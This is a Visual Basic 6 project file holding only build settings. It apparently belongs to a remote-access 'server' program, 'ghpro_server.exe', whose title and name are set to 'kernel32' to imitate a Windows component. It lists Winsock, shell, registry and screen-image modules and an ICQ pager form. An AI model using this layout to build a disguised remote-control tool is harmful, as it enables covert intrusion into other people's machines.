Type=Exe
Form=MainForm.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\SYSTEM\stdole2.tlb#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Module=Module1; Module1.bas
Module=Multimedia; ..\multimedia.bas
Module=Internet; ..\internet.bas
Module=Shell; ..\shell.bas
Module=Wait; ..\sleep.bas
Module=mp3; ..\mp3.bas
Module=bmp2jpg; ..\bmp2jpg.bas
Module=Registry; ..\registry.bas
Form=PagerICQ.frm
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="kernel32"
ExeName32="ghpro_server.exe"
Path32="..\..\..\..\..\WINDOWS\Profiles\Chris\Desktop"
Command32=""
Name="kernel32"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
